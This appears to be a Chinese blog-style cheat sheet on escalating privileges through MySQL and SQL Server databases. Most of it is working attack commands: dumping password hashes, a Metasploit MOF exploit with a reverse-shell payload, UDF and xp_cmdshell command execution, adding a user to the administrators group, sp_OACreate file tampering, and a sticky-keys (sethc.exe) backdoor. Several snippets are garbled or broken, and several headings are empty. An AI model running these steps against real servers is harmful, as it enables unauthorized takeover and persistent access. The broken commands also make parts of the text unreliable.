数据库提权

1 Mysql数据库漏洞提权

  1. 一般Mysql数据库经常使用php进行连接,会有较少的情况使用jsp,python等
  2. Mysql连接文件一般为conn.php、config.php、common.inc.php、config.inc.php等
  3. 所说的mysql权限提升一般在root权限下
1.1 数据库查询

select Host,user,password from mysql.user #需要有root权限

1.2 配置文件读取

网站源码泄露情况主要以程序员上传代码到git等开源平台或更新代码时未删除备份文件(.svn .git .bak),以及运维人员打包源代码到网站服务器(www.rar等)。

user.frm
user.MYD
user.MYI

1.3 下载user文件

user文件在mysql的data目录下

select @@basedir          #当前数据库地址
select @@plugin_dir         #>5.1

2 提权实战

2.1 Mof(托管对象格式)

提权c:/windows/system32/wbem/mof/

  • use exploit/windows/mysql/mysql_mof
  • set password xxx
  • set username xxx
  • set rhost xxx
  • set rport xxx
  • set payload windows/shell_reverse_tcp
  • set lhost xxx
  • set lport xxx
  • exploit
2.2 Udf(用户定义函数)提权
  • 导出C:\windows\udf.dll
  • Create Function cmdshell returns string soname 'udf.dll';
  • select cmdshell('whoami')
  • drop function cmdshell

2 Sql Server 漏洞利用与提权

2.1 SA口令获取方法

2.1.1. Webshell或源码获取
一般在网站的配置文件中有存放明文账号密码,常用配置文件名如:

conn.aspx
config.aspx
config.php
web.config
.........

一般格式如:

server=localhost;
UID=sa;
PWD=shadowflow

2.1.2源代码泄露
网站源码泄露情况主要以程序员上传代码到git等开源平台或更新代码时未删除备份文件(.svn、.git、.bak),以及运维人员打包源代码到网站服务器(www.rar等)。
2.1.3嗅探
在局域网中使用cain等工具进行arp嗅探的时候可以抓取到1433端口的数据库明文登陆密码
2.1.4口令暴力破解
利用mssql暴力破解工具对mssql进行暴力破解,一旦成功将获得sa相应权限

2.2 常用SQL Server提权语句

查看数据库版本
select @@version
查看数据库系统参数
exec master..xp_msver;
查看用户所属角色信息
sp_helpsrvrolemember
查看当前数据库
select db_name()
显示机器上的驱动器
xp_availablemedia


查看当前账户权限
select IS_SRVROLEMEMBER('sysadmin') #判断是否为sa权限
类似serveradmin,setupadmin,securityadmin,diskadmin,bulkadmin

select IS_MEMBER('db_owner') #判断是否为dbo权限

添加用户
exec master.dbo.sp_addlogin test,password #添加用户
exec master.dbo.sp_addsrvrolemember test,sysadmin #加权限
启动停止服务
exec master..xp_servicecontrol 'stop','test'
exec master..xp_servicecontrol 'start','test'
检查功能
SELECT count(*)FROM master.dbo.sysobjects WHERE name='xp_cmdshell'
xp_cmdshell, xpregread,sp_makewebtask,xp_subdirs,xp_dirtree, sp_addextendedproc


xp_cmdshell

  1. 开启xp_cmdshell存储过程
    EXEC sp_configure 'show advanced options',1;RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
  2. 关闭xp_cmdshell存储过程
    EXEC sp_configure 'show advanced options', 1, RECONFIGURE;
    EXEDC sp_configure 'xp_cmdshell',0;RECONFIGURE;
  3. xp_cmdshell执行命令
    exec master..xp_cmdshell 'ver'
    exec master.dbo.xp_cmdshell 'net localgroup administrators test /add'
  4. 恢复xp_cmdshell
  • exec sp_dropextendedproc 'xp_cmdshell'
  • dbcc addextendedproc ("xp_cmdshell","xplog70.dll) OR
    dbcc addextendedproc ("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll");EXEC sp_configure 'show advanced options', 0 --

sp_OACreate

  1. 开启sp_OACreate
    exec sp_configure 'show advanced options', 1;RECONFIGURE;
    exec sp_configure 'Ola Automation Procedures' , 1;RECONFIGURE;
  2. 关闭sp_OACreate
    exec sp_configure 'show advanced options',1;RECONFIGURE;
    exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE;
  3. 禁用advanced options
    EXEC sp_configure 'show advanced options',0;GO RECONFIGURE;
  4. sp_OACreate执行命令

1.DECLARE @js int
1.EXEC sp_OACreate 'ScriptControl',@js OUT
3.EXEC sp_OASetProperty @js,'Language','JavaScript'
4.ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'

  1. sp_OACreate移动文件
    declare @aa int
    exec sp_oacreate 'scripting.filesystemobject' @aa out
    exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log','c:\temp\ipmi1.log';

  2. sp_OACreate复制文件

declare @o int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';

7.sp_OACreate删除文件

DECLARE @Result int

DECLARE @FSO_Token int

EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT

EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile',NULL,'c:\Documents and Settings\All Users\ [开始] 菜单\程序\启动\user.bat'

EXEC @Result = sp_OADestrop @FSO_Token

  1. wscript.shell执行命令
  2. Shell.Application执行命令
  3. sp_oacreate 替换粘贴键

沙盒执行命令

  1. openrowset开启
  2. openrowset关闭
    3.沙盒执行命令

注册表篡改

  1. 注册表劫持粘贴键
sql server提权总结

总结.PNG

sa权限下

  1. 存在xp_cmdshell时
    使用xp_cmdshell执行命令添加用户,当出现错误可以恢复和开启xp_cmdshell
  2. xp_cmdshell无法使用时
    使用sp_OACreate执行命令,同样当出现错误可以恢复和开启
  3. 当执行命令无法使用时可以用沙盒提权 (使用xp_regwrite和openrowset)
  4. 当只有xp_regwrite可用时可以劫持粘滞键(sethc.exe)
    使用xp_regwrite修改注册表

db_owner权限下

  1. 备份到网站目录
  2. 通过备份文件到启动项提权

你可能感兴趣的:(数据库提权)